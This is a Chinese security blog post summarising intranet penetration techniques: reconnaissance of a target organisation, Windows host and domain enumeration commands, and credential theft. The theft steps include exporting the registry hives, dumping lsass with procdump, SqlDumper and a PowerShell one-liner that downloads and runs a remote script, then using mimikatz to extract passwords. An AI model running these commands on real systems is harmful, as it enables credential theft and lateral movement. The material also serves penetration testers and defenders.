<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">



<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  
    
      
    

    
  

  
    
      
    

    
  

  

  
    
      
    

    
  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Monda:300,300italic,400,400italic,700,700italic|sans-serif:300,300italic,400,400italic,700,700italic|Lato:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css">


  <meta name="keywords" content="Web安全,内网,系统安全,后门,">





  <link rel="alternate" href="/atom.xml" title="RcoIl的窝" type="application/atom+xml">




  <link rel="shortcut icon" type="image/x-icon" href="/images/favicon.png?v=5.1.0">






<meta name="description" content="内网渗透，最重要得是定位问题。所以前期的调研和收集是非常重要的一项工作。标：本文多数内容是整合的知识点。">
<meta name="keywords" content="Web安全,内网,系统安全,后门">
<meta property="og:type" content="article">
<meta property="og:title" content="内网渗透归纳（持续更新）">
<meta property="og:url" content="https://rcoil.me/2017/06/内网渗透/index.html">
<meta property="og:site_name" content="RcoIl的窝">
<meta property="og:description" content="内网渗透，最重要得是定位问题。所以前期的调研和收集是非常重要的一项工作。标：本文多数内容是整合的知识点。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://rcoil.me/image/内网渗透/blog_2018-11-16_10-47-14.png">
<meta property="og:image" content="https://rcoil.me/image/内网渗透/切入点.png">
<meta property="og:image" content="https://rcoil.me/image/内网渗透/mimikatz_sam.png">
<meta property="og:image" content="https://rcoil.me/image/内网渗透/powershell_lsass.png">
<meta property="og:updated_time" content="2019-03-28T02:53:17.228Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="内网渗透归纳（持续更新）">
<meta name="twitter:description" content="内网渗透，最重要得是定位问题。所以前期的调研和收集是非常重要的一项工作。标：本文多数内容是整合的知识点。">
<meta name="twitter:image" content="https://rcoil.me/image/内网渗透/blog_2018-11-16_10-47-14.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"always","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '6230266985318450000',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://rcoil.me/2017/06/内网渗透/">





  <title> 内网渗透归纳（持续更新） | RcoIl的窝 </title>
</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?ce3d1967864bac5f69f1c1a6042e5577";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>










  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">RcoIl的窝</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-count">
          <a href="/count" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-fa fa-free-code-camp"></i> <br>
            
            阅读榜
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocapitalize="off" autocomplete="off" autocorrect="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope="" itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="https://rcoil.me/2017/06/内网渗透/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="RcoIl">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="RcoIl的窝">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                内网渗透归纳（持续更新）
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-06-25T21:29:11+08:00">
                2017-06-25
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing">
                  <a href="/categories/内网渗透/" itemprop="url" rel="index">
                    <span itemprop="name">内网渗透</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/2017/06/内网渗透/" class="leancloud_visitors" data-flag-title="内网渗透归纳（持续更新）">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                <!--
				<i class="fa fa-eye"></i>
				-->
				<i class="fa fa-thermometer-three-quarters" aria-hidden="true"></i>
               </span>
               
                 <span class="post-meta-item-text">热度 </span>
               
                 <span class="leancloud-visitors-count"></span>
				 <span>℃</span>
             </span>
          

          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>内网渗透，最重要得是定位问题。所以前期的调研和收集是非常重要的一项工作。<br>标：本文多数内容是整合的知识点。<br><a id="more"></a></p>
<hr>
<h1 id="0x00-前期基本信息探测"><a href="#0x00-前期基本信息探测" class="headerlink" title="0x00 前期基本信息探测"></a>0x00 前期基本信息探测</h1><p>尽可能详细得分析出网段信息、各部门ip段、重点找出IT运维部、OA、邮箱服务器、人力资源管理等。<br>最后画一张组织结构图，这样在内网定位的时候，无论是针对内网查找资料还是针对特殊任务都是非常实用的一项技术。<br>不过信息收集，不是一天两天就能完成的事情，这种事情要持之以恒。</p>
<h2 id="一、人事组织结构图"><a href="#一、人事组织结构图" class="headerlink" title="一、人事组织结构图"></a>一、人事组织结构图</h2><p>demo:<br><img src="/image/内网渗透/blog_2018-11-16_10-47-14.png" alt="安创科技"></p>
<p>思路：这种人事图，除了在外部站点上有，也可以到首页去查找<code>关于我们</code>，有一些简单的说明，然后再去招聘网找各式的岗位名称，最后连蒙带猜（没有这样的操作），收集尽量精确能到各个人员。当然，想要详细，就得通过不同的渠道获取。</p>
<h2 id="二、ip分布"><a href="#二、ip分布" class="headerlink" title="二、ip分布"></a>二、ip分布</h2><p>思路：</p>
<ol>
<li>一般大公司有内部门户系统，可通过内部门户系统公开链接找出部门ip段（如果找到路由也很惊喜）；</li>
<li>内网中可通过路由器、交换机等设备命令执行、snmp、弱口令获取网络拓扑；</li>
<li>DNS域传送信息泄漏；</li>
</ol>
<hr>
<h1 id="0x01-切入点（起点）"><a href="#0x01-切入点（起点）" class="headerlink" title="0x01 切入点（起点）"></a>0x01 切入点（起点）</h1><p><img src="/image/内网渗透/切入点.png" alt="切入点.png"></p>
<ol>
<li>Web门户系统getshell –&gt; system权限；</li>
<li>邮件服务器；</li>
<li>邮件服务器获取信息中得出VPN账密和IP地址；</li>
<li>路由器建立VPN进入；</li>
<li>社工上线；</li>
<li>待更新…</li>
</ol>
<hr>
<h1 id="0x02-靶机信息收集"><a href="#0x02-靶机信息收集" class="headerlink" title="0x02 靶机信息收集"></a>0x02 靶机信息收集</h1><p>主要针对三种：</p>
<ol>
<li>基于命令形式的，包括权限信息，机器信息，进程端口，网络连接，共享、会话等等；</li>
<li>基于应用与文件形式的，例如一些敏感文件，密码文件，浏览器，远程连接客户端等；</li>
<li>还有一种是最直接的，例如抓取本地明文与hash，键盘记录，屏幕记录等。</li>
</ol>
<p>网上已经有大量相关的资源与文章了，这里就不再占篇幅了，只说点额外的不常见技巧。</p>
<h2 id="一、命令行形式"><a href="#一、命令行形式" class="headerlink" title="一、命令行形式"></a>一、命令行形式</h2><p>包括但不限于一下几点</p>
<h3 id="（一）常用命令"><a href="#（一）常用命令" class="headerlink" title="（一）常用命令"></a>（一）常用命令</h3><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">hostname #主机名</span><br><span class="line">systeminfo #系统信息（所在域，开机时间，安装信息，补丁情况，系统版本）</span><br><span class="line"><span class="builtin-name">set</span> #环境变量</span><br><span class="line">net<span class="built_in"> user </span>#查看默认用户</span><br><span class="line">net view #显示当前域或工作组中计算机的列表</span><br><span class="line">net localgroup #查看用户组</span><br><span class="line">net localgroup Administrators #查看Administrators组所有用户(包括隐藏用户)</span><br><span class="line">query<span class="built_in"> user </span>#查看当前会话（window7 64以上）</span><br><span class="line">tasklist /v #显示当前进程和进程用户</span><br><span class="line">net<span class="built_in"> config </span>workstation #查看当前登陆用户信息</span><br><span class="line">net statistics workstation #查看主机开机时间</span><br><span class="line">net share #查看共享文件夹</span><br></pre></td></tr></table></figure>
<h3 id="（二）不常用命令"><a href="#（二）不常用命令" class="headerlink" title="（二）不常用命令"></a>（二）不常用命令</h3><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">whoami /all   查看Mandatory Label看我们是否过uac</span><br><span class="line">net session    查看有没有远程连过来的session</span><br><span class="line">cmdkey /l     看是否保存了登陆凭证.（凭据管理器）</span><br><span class="line">echo %logonserver%  查看登陆域</span><br><span class="line">net stitastics<span class="built_in"> server </span> 查看登陆时间</span><br><span class="line">Wmic  能让攻击者大量利用来获取系统信息的系统自带工具</span><br><span class="line">	wmic qfe list #获取补丁信息</span><br><span class="line">Netsh  做端口转发</span><br><span class="line">spn –l administrator 域内查某个用户spn记录</span><br><span class="line">dsquery | nltest  域内信息收集</span><br></pre></td></tr></table></figure>
<h2 id="二、应用与文件形式"><a href="#二、应用与文件形式" class="headerlink" title="二、应用与文件形式"></a>二、应用与文件形式</h2><p>虽然标题不错，但是内容只是去翻文件，包括一些应用的配置文件，密码文件等。<br>有时候会碰到一些加密的office办公软件，例如word,excel 这些。</p>
<blockquote>
<p>如果是低版本如2003的话，攻击者会在百度搜一些网上的破解软件进行破解（会联网）。<br>如果是高版本的话，往往在目标用户开着文件时使用微软SysinternalsSuite套装中的procdump将内存dump回去，用内存查看器直接查看文件内容。</p>
</blockquote>
<p>因此就算有些敏感文件加密了照样能够被攻击者获取敏感信息。</p>
<h2 id="三、hash和明文"><a href="#三、hash和明文" class="headerlink" title="三、hash和明文"></a>三、hash和明文</h2><p>这一步使用mimikatz基本就足够了，也分exe、dll与ps三个版本，分情况使用，但免杀是个问题。</p>
<h3 id="（一）从-sam-中提取目标系统本地用户密码-hash"><a href="#（一）从-sam-中提取目标系统本地用户密码-hash" class="headerlink" title="（一）从 sam 中提取目标系统本地用户密码 hash"></a>（一）从 sam 中提取目标系统本地用户密码 hash</h3><p>使用<code>reg</code>将<code>sam</code>、<code>system</code>和<code>security</code>文件导出来，并拖回本地。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"># &gt;cd Desktop</span><br><span class="line"></span><br><span class="line"># Desktop&gt;reg save HKLM\SYSTEM system.hiv</span><br><span class="line">The operation completed successfully.</span><br><span class="line"></span><br><span class="line"># Desktop&gt;reg save HKLM\SAM sam.hiv</span><br><span class="line">The operation completed successfully.</span><br><span class="line"></span><br><span class="line"># Desktop&gt;reg save HKLM\SECURITY sercrity.hiv</span><br><span class="line">The operation completed successfully.</span><br></pre></td></tr></table></figure>
<p>PS：本地复原机器与目标机器务必一致。复原结果：</p>
<p><img src="/image/内网渗透/mimikatz_sam.png" alt="mimikatz_sam.png"></p>
<p>这个方法在某些情况下有奇效。</p>
<h3 id="（二）通过-dump-lsass-exe-进程数据离线免杀抓明文的各种方式"><a href="#（二）通过-dump-lsass-exe-进程数据离线免杀抓明文的各种方式" class="headerlink" title="（二）通过 dump lsass.exe 进程数据离线免杀抓明文的各种方式"></a>（二）通过 dump lsass.exe 进程数据离线免杀抓明文的各种方式</h3><h4 id="1、procdump-exe"><a href="#1、procdump-exe" class="headerlink" title="1、procdump.exe"></a>1、procdump.exe</h4><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">C:\temp\procdump<span class="selector-class">.exe</span> -accepteula -ma lsass<span class="selector-class">.exe</span> lsass<span class="selector-class">.dmp</span> <span class="comment">//For 32 bits</span></span><br><span class="line">C:\temp\procdump<span class="selector-class">.exe</span> -accepteula -<span class="number">64</span> -ma lsass<span class="selector-class">.exe</span> lsass<span class="selector-class">.dmp</span> <span class="comment">//For 64 bits</span></span><br></pre></td></tr></table></figure>
<p>本地还原</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-tag">mimikatz</span><span class="selector-class">.exe</span></span><br><span class="line"><span class="selector-tag">sekurlsa</span><span class="selector-pseudo">::minidump</span> <span class="selector-tag">lsass</span><span class="selector-class">.dmp</span></span><br><span class="line"><span class="selector-tag">sekurlsa</span><span class="selector-pseudo">::logonPasswords</span> <span class="selector-tag">full</span></span><br></pre></td></tr></table></figure>
<h4 id="2、PowerShell"><a href="#2、PowerShell" class="headerlink" title="2、PowerShell"></a>2、PowerShell</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Public&gt;powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1');"Get-Process lsass | Out-Minidump"</span></span><br><span class="line">或者本机执行</span><br><span class="line"><span class="comment"># Public&gt;powershell –exec bypass –Command "&amp; &#123;Import-Module 'C:\Users\Public\Out-Minidump.ps1'; Get-Process lsass | Out-Minidump&#125;"</span></span><br></pre></td></tr></table></figure>
<p><img src="/image/内网渗透/powershell_lsass.png" alt="mimikatz_sam.png"></p>
<p>PS：<code>Out-Minidump.ps1</code>有C# 版本<a href="https://github.com/GhostPack/SharpDump" target="_blank" rel="noopener">SharpDump</a>。</p>
<h4 id="3、SqlDumper"><a href="#3、SqlDumper" class="headerlink" title="3、SqlDumper"></a>3、SqlDumper</h4><p>如果目标系统上安装了<code>Windows SQL Server</code>，<code>SqlDumper.exe</code>默认存放在c:\Program Files\Microsoft SQL Server\number\Shared，其中number代表sql server的版本。</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">140 <span class="keyword">for</span> SQL<span class="built_in"> Server </span>2017</span><br><span class="line">130 <span class="keyword">for</span> SQL<span class="built_in"> Server </span>2016</span><br><span class="line">120 <span class="keyword">for</span> SQL<span class="built_in"> Server </span>2014</span><br><span class="line">110 <span class="keyword">for</span> SQL<span class="built_in"> Server </span>2012</span><br><span class="line">100 <span class="keyword">for</span> SQL<span class="built_in"> Server </span>2008</span><br><span class="line">90 <span class="keyword">for</span> SQL<span class="built_in"> Server </span>2005</span><br></pre></td></tr></table></figure>
<p>当然，如果没有安装有<code>Windows SQL Server</code>的话，可以自己上传一个<code>SqlDumper.exe</code></p>
<p>上去。</p>
<p>使用方法：</p>
<figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">c:\Users\Public&gt;tasklist /svc |findstr lsass.exe"</span><br><span class="line">lsass.exe                      512 SamSs</span><br><span class="line"></span><br><span class="line">c:\Users\Public&gt;SqlDumper-2016.exe 512 0 0x01100</span><br><span class="line">Parsed parameters:</span><br><span class="line">    ProcessID = 512</span><br><span class="line">    ThreadId = 0</span><br><span class="line">    Flags = 0x120</span><br><span class="line">    MiniDumpFlags = 0x1966</span><br><span class="line">    SqlInfoPtr = 0x0000000000000000</span><br><span class="line">    DumpDir = &lt;NULL&gt;</span><br><span class="line">    ExceptionRecordPtr = 0x0000000000000000</span><br><span class="line">    ContextPtr = 0x0000000000000000</span><br><span class="line">    ExtraFile = &lt;NULL&gt;</span><br><span class="line">    PatternForExtraFiles = &lt;NULL&gt;</span><br><span class="line">    InstanceName = &lt;NULL&gt;</span><br><span class="line">    ServiceName = &lt;NULL&gt;</span><br><span class="line">Remote process didn't specify a dump <span class="keyword">file</span> name</span><br><span class="line">Target suspended</span><br><span class="line">Callback <span class="keyword">type</span> 11 not used</span><br><span class="line">Callback <span class="keyword">type</span> 15 not used</span><br><span class="line">Callback <span class="keyword">type</span> 7 not used</span><br><span class="line">MiniDump completed: SQLDmpr0001.mdmp</span><br><span class="line"><span class="keyword">Total</span> Buffer pool data pages filtered <span class="keyword">out</span>: 0 KB</span><br><span class="line"><span class="keyword">Total</span> Hekaton data pages filtered <span class="keyword">out</span>: 0 KB</span><br><span class="line"><span class="keyword">Total</span> Free <span class="keyword">memory</span> (from non top level allocators) filtered <span class="keyword">out</span>: 0 KB</span><br><span class="line"><span class="keyword">Total</span> top level free <span class="keyword">memory</span> filtered <span class="keyword">out</span>: 0 KB</span><br><span class="line"><span class="keyword">Total</span> <span class="keyword">Log</span> pool <span class="keyword">memory</span> filtered <span class="keyword">out</span>: 0 KB</span><br><span class="line">Location of module 'dbghelp.dll' : 'C:\Windows\system32\dbghelp.dll'</span><br><span class="line"><span class="keyword">File</span> <span class="keyword">version</span> of module 'C:\Windows\system32\dbghelp.dll' : '6.1:7601.17514'</span><br><span class="line">Product <span class="keyword">version</span> of module 'C:\Windows\system32\dbghelp.dll' : '6.1:7601.17514'</span><br><span class="line">GetModuleHandle () Failed 0x7e - The specified module could not be found.</span><br><span class="line"></span><br><span class="line">Watson Invoke: <span class="keyword">No</span></span><br></pre></td></tr></table></figure>
<h3 id="（三）关于-windows-10-2012r2-以后系统的明文密码抓取方式"><a href="#（三）关于-windows-10-2012r2-以后系统的明文密码抓取方式" class="headerlink" title="（三）关于 windows 10 / 2012r2 以后系统的明文密码抓取方式"></a>（三）关于 windows 10 / 2012r2 以后系统的明文密码抓取方式</h3><p>在<code>windows 10 / 2012</code>之后的系统版本中，默认情况下是禁用了在内存缓存中存储系统用户明文密码。此时使用mimikatz去抓取密码，会显示null。</p>
<p>解决办法为：修改注册表–&gt; <a href="http://www.ansbase5.info/?p=136" target="_blank" rel="noopener">抓取windows server 2012 &amp; 2016 &amp; win8明文密码</a>。</p>
<h1 id="0x03-网络环境的判断"><a href="#0x03-网络环境的判断" class="headerlink" title="0x03 网络环境的判断"></a>0x03 网络环境的判断</h1><ol>
<li>机器所处位置区域的判断;</li>
<li>机器角色的判断;</li>
<li>进出口流量是否连通的判断，是否出的去，进的来。</li>
</ol>
<h2 id="一、位置的判断"><a href="#一、位置的判断" class="headerlink" title="一、位置的判断"></a>一、位置的判断</h2><p>位置判断是指机器处于网络拓扑中的某个区域，是在DMZ区，办公网，还是核心区，核心DB等多个位置，当然这里的区域并不是绝对的，只是大概的一个环境，不同的地方网络环境不一样，区域的界限也不一定明显。</p>
<h2 id="二、角色的判断"><a href="#二、角色的判断" class="headerlink" title="二、角色的判断"></a>二、角色的判断</h2><p>机器角色的判断指判断已经控制的机器是普通Web服务器、开发测试服务器、公共服务器、文件服务器还是代理服务器、DNS服务器、存储服务器等等。具体的判断是通过对机器内的主机名、文件、网络连接等多种情况进行综合判断的。</p>
<h2 id="三、连通性的判断"><a href="#三、连通性的判断" class="headerlink" title="三、连通性的判断"></a>三、连通性的判断</h2><p>出口流量是否连通的判断指机器是否能上外网这些，要综合判断协议（tcp\http\dns\icmp等协议）与端口(常见能出去的端口有80,8080,443,53,110,123等)。在这里还有一种是网络内网设置了代理服务器的情况，攻击者通常会查看环境变量set，主机名是否有proxy字样的机器，注册表是否有写明代理地址或指定pac代理文件等。</p>
<hr>
<h1 id="0x04-横向渗透"><a href="#0x04-横向渗透" class="headerlink" title="0x04 横向渗透"></a>0x04 横向渗透</h1><p>如果是workgroup横向，攻击者会尝试web漏洞挖掘、密码猜解、嗅探等，方法不是特别的多。<br>如果是domain横向，方法就比较多了，在workgroup横向多了例如AD2008 gpp 、ms14-068 、kerberoast 和配置错误等。</p>
<h2 id="一、默认权限配置认知"><a href="#一、默认权限配置认知" class="headerlink" title="一、默认权限配置认知"></a>一、默认权限配置认知</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">[+]普通机器</span><br><span class="line">允许Console：administrator组（domain admins），users组（domain users），<span class="keyword">backup</span> operators组</span><br><span class="line">允许rdp：administrator组（<span class="keyword">domain</span> admins），Remote desktop <span class="keyword">users</span>组</span><br><span class="line"></span><br><span class="line">[+]域控AD</span><br><span class="line">允许Console：administrator组，<span class="keyword">backup</span> operators组，<span class="keyword">account</span> operators组，print operators组，<span class="keyword">server</span> operators组</span><br><span class="line">允许rdp：administrator组，Remote desktop <span class="keyword">users</span>组</span><br></pre></td></tr></table></figure>
<p>如果出现配置错误，那就是权限配置问题。</p>
<p>tips：当某些<code>普通\不普通用户</code>加入AD的rdp组或其他管理员组，当攻击者拿到这些用户的权限时就相当于可以获取到域控制器的权限了。</p>
<h2 id="二、代理转发"><a href="#二、代理转发" class="headerlink" title="二、代理转发"></a>二、代理转发</h2><p><a href="http://rcoil.me/2017/06/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-%E4%B9%8B-%E4%BB%A3%E7%90%86%E7%AF%87/">渗透测试-之-代理篇</a></p>
<h2 id="三、工作组横向"><a href="#三、工作组横向" class="headerlink" title="三、工作组横向"></a>三、工作组横向</h2><p>工作组横向的方法、花样要比域环境少得多。 </p>
<p>工作组一般都是个人机和少数服务器。通常使用的方法有：</p>
<ul>
<li>扫描网段中的web服务，个人机可能会存在一些默认的基础环境，供个人测试使用。比如：<code>phpStudy</code>、<code>AppServ</code>、<code>XAMPP</code>，这些基本都是默认配置；</li>
<li>MS17-010，补丁号为<code>KB4013389</code>；</li>
<li>hash抓取 –&gt; hash注入、IPC登陆 –&gt; hash碰撞；</li>
<li>在无凭证的条件下使用<code>Responder</code>；</li>
<li>ARP嗅探/欺骗攻击（Cain和Ettercap）–&gt; 不推荐使用；</li>
<li>会话劫持；</li>
<li>最佳助攻 –&gt; 社会工程学；</li>
<li>待更新….</li>
</ul>
<h2 id="四、域环境横向（单域）"><a href="#四、域环境横向（单域）" class="headerlink" title="四、域环境横向（单域）"></a>四、域环境横向（单域）</h2><h3 id="（一）域内信息探测"><a href="#（一）域内信息探测" class="headerlink" title="（一）域内信息探测"></a>（一）域内信息探测</h3><ul>
<li>Windows环境<br>常用命令<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">net<span class="built_in"> user </span>/domain  #查看域用户</span><br><span class="line">net view /domain  #查看有几个域</span><br><span class="line">net view /domain:XXX  #查看此域内电脑</span><br><span class="line">net<span class="built_in"> group </span>/domain  #查询域里面的组</span><br><span class="line">net<span class="built_in"> group </span><span class="string">"domain computers"</span> /domain  #查看加入到域内的所有计算机名</span><br><span class="line">net<span class="built_in"> group </span><span class="string">"domain admins"</span> /domain  #查看域管理员</span><br><span class="line">nltest /dclist:xxx  #查看域控制器</span><br><span class="line">net<span class="built_in"> group </span><span class="string">"domain controllers"</span> /domain  #查看域控制器</span><br><span class="line">net<span class="built_in"> user </span>hacker /domain  #获得指定账户的详细信息</span><br><span class="line">net accounts /domain  #获得域密码策略设置，密码长短，错误锁定等信息</span><br></pre></td></tr></table></figure>
</li>
</ul>
<p>dsquery 命令 查询 AD<br><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">dsquery computer - 查找目录中的计算机。</span><br><span class="line">dsquery contact - 查找目录中的联系人。</span><br><span class="line">dsquery subnet - 查找目录中的子网。</span><br><span class="line">dsquery<span class="built_in"> group </span>- 查找目录中的组。</span><br><span class="line">dsquery ou - 查找目录中的组织单位。</span><br><span class="line">dsquery site - 查找目录中的站点。</span><br><span class="line">dsquery<span class="built_in"> server </span>- 查找目录中的 AD DC/LDS 实例。</span><br><span class="line">dsquery<span class="built_in"> user </span>- 查找目录中的用户。</span><br><span class="line">dsquery quota - 查找目录中的配额规定。</span><br><span class="line">dsquery partition - 查找目录中的分区。</span><br><span class="line">dsquery * - 用通用的 LDAP 查询来查找目录中的任何对象。</span><br></pre></td></tr></table></figure></p>
